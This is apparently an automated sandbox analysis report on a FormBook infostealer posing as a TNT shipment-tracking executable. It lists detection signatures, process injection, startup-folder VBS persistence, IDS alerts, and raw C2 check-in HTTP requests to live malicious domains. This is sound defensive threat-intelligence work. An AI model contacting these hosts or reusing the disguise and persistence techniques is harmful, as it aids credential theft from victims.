Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TNT AWB TRACKING DETAILS.exe

Overview

General Information

Sample name:TNT AWB TRACKING DETAILS.exe
Analysis ID:1576937
MD5:c32b24d16816af9addd23883f8b474bb
SHA1:17e0ef8034418ee6bf28e6436a95e5c16a4f2b2e
SHA256:de25835c72e839f3e2ef5636b3a144a584a4a5f9aec9bfacf474a9740ea135dd
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • TNT AWB TRACKING DETAILS.exe (PID: 4392 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: C32B24D16816AF9ADDD23883F8B474BB)
    • jailkeeper.exe (PID: 6140 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: C32B24D16816AF9ADDD23883F8B474BB)
      • svchost.exe (PID: 2404 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • bRQIkEscRm.exe (PID: 2248 cmdline: "C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • mobsync.exe (PID: 5236 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
            • firefox.exe (PID: 6336 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wscript.exe (PID: 6536 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • jailkeeper.exe (PID: 4372 cmdline: "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe" MD5: C32B24D16816AF9ADDD23883F8B474BB)
      • svchost.exe (PID: 5764 cmdline: "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              6.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                6.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  3.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , ProcessId: 6536, ProcessName: wscript.exe
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: `, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, ParentProcessId: 6140, ParentProcessName: jailkeeper.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ProcessId: 2404, ProcessName: svchost.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs" , ProcessId: 6536, ProcessName: wscript.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: `, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, ParentProcessId: 6140, ParentProcessName: jailkeeper.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ProcessId: 2404, ProcessName: svchost.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe, ProcessId: 6140, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-17T18:39:08.495731+010028554651A Network Trojan was detected192.168.2.6498413.33.130.19080TCP
                    2024-12-17T18:39:34.352227+010028554651A Network Trojan was detected192.168.2.6499023.33.130.19080TCP
                    2024-12-17T18:39:57.628568+010028554651A Network Trojan was detected192.168.2.6499598.217.17.19280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-17T18:39:25.345565+010028554641A Network Trojan was detected192.168.2.6498803.33.130.19080TCP
                    2024-12-17T18:39:28.014150+010028554641A Network Trojan was detected192.168.2.6498863.33.130.19080TCP
                    2024-12-17T18:39:30.768674+010028554641A Network Trojan was detected192.168.2.6498953.33.130.19080TCP
                    2024-12-17T18:39:49.598024+010028554641A Network Trojan was detected192.168.2.6499388.217.17.19280TCP
                    2024-12-17T18:39:52.254372+010028554641A Network Trojan was detected192.168.2.6499448.217.17.19280TCP
                    2024-12-17T18:39:54.910475+010028554641A Network Trojan was detected192.168.2.6499518.217.17.19280TCP
                    2024-12-17T18:40:04.454686+010028554641A Network Trojan was detected192.168.2.649976209.74.64.18980TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://www.arcare.partners/0w45/?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHsAvira URL Cloud: Label: malware
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeReversingLabs: Detection: 57%
                    Multi AV Scanner detection for submitted file
                    Source: TNT AWB TRACKING DETAILS.exeReversingLabs: Detection: 57%
                    Yara detected FormBook
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2680764092.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2686142507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3366041781.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2667870776.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: TNT AWB TRACKING DETAILS.exeJoe Sandbox ML: detected
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000003.00000003.2630678444.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630522775.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630705892.0000000003431000.00000004.00000020.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2747438856.0000000001101000.00000004.00000001.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2611735467.00000000010EB000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bRQIkEscRm.exe, 00000009.00000002.3366053235.00000000007CE000.00000002.00000001.01000000.00000007.sdmp
                    Source: Binary string: wntdll.pdbUGP source: jailkeeper.exe, 00000002.00000003.2154686403.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000002.00000003.2155085204.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2557720740.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2560047406.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2267441027.0000000003520000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2283959181.0000000003710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2677219601.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2681110501.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.0000000005110000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.00000000052AE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2674544260.0000000004F66000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2672194568.0000000004DB6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: jailkeeper.exe, 00000002.00000003.2154686403.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000002.00000003.2155085204.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.2675149274.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2557720740.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2560047406.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2267441027.0000000003520000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2283959181.0000000003710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2677219601.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2681110501.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.0000000005110000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.00000000052AE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2674544260.0000000004F66000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2672194568.0000000004DB6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mobsync.pdb source: svchost.exe, 00000003.00000003.2630678444.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630522775.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630705892.0000000003431000.00000004.00000020.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2747438856.0000000001101000.00000004.00000001.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2611735467.00000000010EB000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F2445A
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2C6D1 FindFirstFileW,FindClose,0_2_00F2C6D1
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F2C75C
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F2EF95
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F2F0F2
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2F3F3
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F237EF
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F23B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F23B12
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2BCBC
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0022445A
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022C6D1 FindFirstFileW,FindClose,2_2_0022C6D1
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0022C75C
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0022EF95
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0022F0F2
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0022F3F3
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_002237EF
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_00223B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00223B12
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0022BCBC

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49880 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49841 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49902 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49886 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49895 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49938 -> 8.217.17.192:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49944 -> 8.217.17.192:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49951 -> 8.217.17.192:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49976 -> 209.74.64.189:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49959 -> 8.217.17.192:80
                    Performs DNS queries to domains with low reputation
                    Source: DNS query: www.medicaresbasics.xyz
                    Source: Joe Sandbox ViewIP Address: 209.74.64.189 209.74.64.189
                    Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
                    Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                    Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                    Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F322EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F322EE
                    Source: global trafficHTTP traffic detected: GET /0w45/?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHs HTTP/1.1Host: www.arcare.partnersAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                    Source: global trafficHTTP traffic detected: GET /fm31/?RDupG=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdo7ay1JwtOyJ6xNFGeQNVfJ28IEF3RMXp+OfpErOuMFhdC67R3g=&wdw=m8AHs HTTP/1.1Host: www.medicaresbasics.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                    Source: global trafficHTTP traffic detected: GET /ir1u/?RDupG=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX86+yEJ2aXOXj0apRFi4P0I8PrRUWlOvP3kyATHOLhpgDgxP6JOJQ=&wdw=m8AHs HTTP/1.1Host: www.meliorahomes.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                    Source: global trafficDNS traffic detected: DNS query: www.arcare.partners
                    Source: global trafficDNS traffic detected: DNS query: www.medicaresbasics.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.resellnexa.shop
                    Source: global trafficDNS traffic detected: DNS query: www.meliorahomes.net
                    Source: global trafficDNS traffic detected: DNS query: www.martmall.info
